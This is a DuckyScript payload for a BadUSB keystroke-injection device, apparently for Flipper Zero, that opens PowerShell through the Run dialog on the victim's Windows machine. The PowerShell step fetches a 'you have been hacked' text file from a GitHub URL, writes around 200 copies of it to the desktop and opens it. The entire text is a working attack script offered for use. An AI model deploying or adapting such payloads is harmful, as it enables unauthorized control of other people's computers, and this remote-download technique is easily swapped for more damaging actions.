REM Author: SeenKid (seenkid#1337 on Discord)
REM Description: Creates a lot of files with the text you have been hacked on desktop.
REM Version:	1.0
DELAY 800
GUI r
DELAY 800
STRING powershell
ENTER
DELAY 800
STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/hacked.txt -OutFile $DesktopPath/H4ck3D.txt; while($ac -lt 200) { Copy-Item "$DesktopPath/H4ck3D.txt" -Destination "$DesktopPath/hacked$ac.txt"; $ac++};Start-Process -FilePath "$DesktopPath/H4ck3D.txt" 
DELAY 600
ENTER